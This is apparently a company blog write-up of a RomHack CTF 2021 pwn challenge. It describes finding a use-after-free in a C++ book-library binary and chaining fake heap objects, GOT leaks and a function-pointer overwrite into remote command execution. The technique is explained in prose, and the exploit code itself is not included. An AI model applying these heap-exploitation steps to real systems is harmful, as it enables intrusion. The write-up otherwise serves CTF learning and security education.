At Wuerth Phoenix, we recently introduced a security-focused guild, and decided to attend our first security CTF (Capture The Flag) challenge: RomHack CTF 2021.
After panicking initially (there were really difficult challenges!) we stayed calm, and managed to solve the table of contents challenge in the ‘pwn’ category, which made our team finish in 21st place (!!) out of over 800 teams.
As for most of the ‘pwn’ challenges, the program we had to exploit was provided as a compiled binary executable, but no glibc binary was provided. Often this means that you will need to leak multiple addresses from the GOT (Global Offset Table) in order to discover the remotely running glibc version in order to be able to exploit the vulnerability.
When running the exploitable binary, a menu is presented that lets you manage a library of books:
First I analyzed the binary and studied the functions with ghidra. It stood out to me that it was a C++ written program using OOP (Object Oriented Programming). There was a std::vector
object of Book
objects. When donating a new book to the library, the add
function was called:
I clearly saw that first the title is asked for (line 14), then the title is read from stdin
(line 15), a new Book
object is allocated (line 17) and then the new Book
is pushed to a vector called items
(line 23).
So what I understood was that the books are stored inside the items
vector, and we can insert however many books we want.
After studying the other functions, I noticed the fetch
function and saw a strange detail in the decompiled code: The first part (that I omitted) was about asking for the index of the book, and the input was properly checked. But afterwards, if I chose to borrow the book:
The book is shallow-copied to another book entry called ‘borrowed
‘ (lines 54-85) then the book is free
d from memory (line 89) and the memory address of the book object itself is printed back as a reference number of the book (line 93). And here we go! They did it wrong, they forgot to remove the book from the vector items
and freed the book directly instead. That means that the book is still inside the vector and I can print it with the “list books” functionality.
I had clearly discovered a UAF (use after free) vulnerability here.
First I wanted to to leak a couple of GOT addresses in order to understand which libc version was running on the remote machine, and after knowing that, overwriting some GOT entries or the free_hook. For this reason, the first thing I focused on was getting a read what where primitive, which I could use for this scope.
Create a read what where primitive
So let’s take a look at how the memory of the objects is organized:
From Figure 4 I can see that items is a vector that contains the addresses of the Book objects. If I pick one book object (book with index 1 in the example) and dump its memory, I immediately see that at offset +0x8 (8 bytes) there is a pointer to a string that contains the title of the book (“BOOK2” in the example), and in offset +0x10 (16 bytes) I find the length of the title (5 characters in the example). With the “list book” functionality all titles are printed to the screen:
That means that if I can artificially craft a book with a title pointer pointing to a memory location I want to dump, I can dump any number of bytes of any location. Let’s further analyze the functionalities the program offers us. Let’s take a closer look at the ‘add_page’ functionality inside the “fetch” function:
Looking at the analyzed binary in ghidra, I noticed that the add_page function was part of the Book object itself:
I see that the size of the page is asked for and read from standard input (line 12 and 13) and then this exact size is allocated in memory (line 16). Then the content of the page is asked for (line 17) and read from stdin (line 18). At the end, the new page is pushed to the vector of pages of this book (line 19).
With this functionality, I can allocate an arbitrary heap chunk in memory (choosing size and content). Great! I can fake our book now!
So let’s first understand how big a Book object is:
using the gdb gef plugin helps us to analyze in an easy way the heap chunk allocated for a Book. So again let’s pick the same book as before taking the second entry (index nr. 1) of the items vector.
A Book object chunk has size 0x50 (80) bytes. Considering that 16 bytes are used by libc for referencing the allocated chunks (See ‘X’ chars in Figure 9) we need to allocate 0x40 (64) bytes. Remembering the dump of a Book object (see Figure 4) we need to copy the first 8 bytes as any other Book object (to make it look like a legitimate Book object (see ‘0x404290’ bytes in Figure 9), then write the address (8 bytes, we have a 64bit executable) that points to the memory we want to leak (See ‘A’ chars in Figure 9), then the size of the dump we want to perform (8 bytes, we only want to leak one single address at a time, see ‘S’ chars in Figure 9), and finally other bytes only to fill up the entire allocation (40bytes remaining, see ‘Z’ chars in Figure 9).
So finally the steps are:
For this purpose I wrote two functions; the setup_heap function executing Step 1 and Step 2 and the read_arbitrary_address running Step 3, Step 4 and Step 5:
We see that the GOT table entry for the ‘printf’ function is located at 0x605eb0; leaking memory works flawlessly with this primitive:
We see the leaked memory instead of the title of BOOK3. Leaked bytes need to be inverted (because of the little endianess of the x86_64 architecture) and we can defeat ASLR (Address Space Layout Randomization) by leaking the printf function location:
Creating a write what where primitive
Now that we have a read what where primitive we need to create a write what where one. Analyzing the ‘return book’ functionality we see that the reference number given after borrowing a book is answered back. Looking at the code we see that this number is treated as a direct memory location and the content of the borrowed book is written back to this location:
At line 11 an address is read from input and at line 18 the content of the borrowed book is copied 1:1 to this location. Looking at the dump of a Book object of Figure 4, we remember that we control part of this memory through the Book title we give when donating a book. In fact at offset Book+0x18 (24) we find the string of the title itself that we control. So by returning a book using the address we want to write to -0x18 (24) as a reference number will write the content of the title in this address.
The idea worked pretty well but trying to overwrite the free_hook
pointer resulted on a strange memory access error (maybe a new security check built inside new glibc versions? I need to investigate this.)
It was pretty late in the evening and I got really frustrated and decided to go to sleep.
Throw away almost everything and get RCE
During the break I remembered that I saw the system
function entry inside the GOT, which means that it’s used somewhere inside our program! So searching for references to system
I immediately found a perfectly crafted function that helped out for RCE (Remote Command Execution):
Looking at the constructor of the Book
object I saw that it inherited from the LibraryItem
object. This means that if I can overwrite a function pointer that has a string as first parameter with content that I’m in control of, I can achieve remote code execution! First I looked at the add_page
function (see Figure 7) but it doesn’t accept any arguments. But some minutes later I immediately realized that there’s another feature I didn’t explain, the feedback function that simply clears out a string with zeroes:
If you compare the parameters of Book::feedback
and LibraryItem::win
you will notice they are the same, and we can trigger the Book::feedback
function through the leave_feedback
function:
At line 15-16 the index of the book is requested, then a new feedback of fixed size is allocated (line 19). A string is retrieved from stdin
(line 22), the book object pointer is retrieved from the items
vector (line 24), a function pointer is extracted from the Book
object content at offset Book+0x28 (40) (line 27), the string is converted to a c_string
(line 28) and then passed as an argument to the previously extracted function (line 29). You can see there are 2 arguments, the book and the string we asked for.
Now it was clear to me that if in my fake book entry I put the address of LibraryItem::win
instead of the address of Book::feedback
(in location self+0x28 (40)) and tried to add a feedback item to that fake book with an arbitrary command as feedback, system
on this command will be executed!
Building the final exploit
So finally we needed to build a book that points to itself (first 8 bytes of memory must be the address of the memory we are writing to) and has the address of the LibraryItem::win
function (using ghidra it’s found at 0x401e30) at offset +0x28 (40):
we got remote code execution and retrieved the flag:
hope you enjoyed my journey from starting the challenge to the final exploit! You can find the full exploit code on my github repo.
Happy hacking!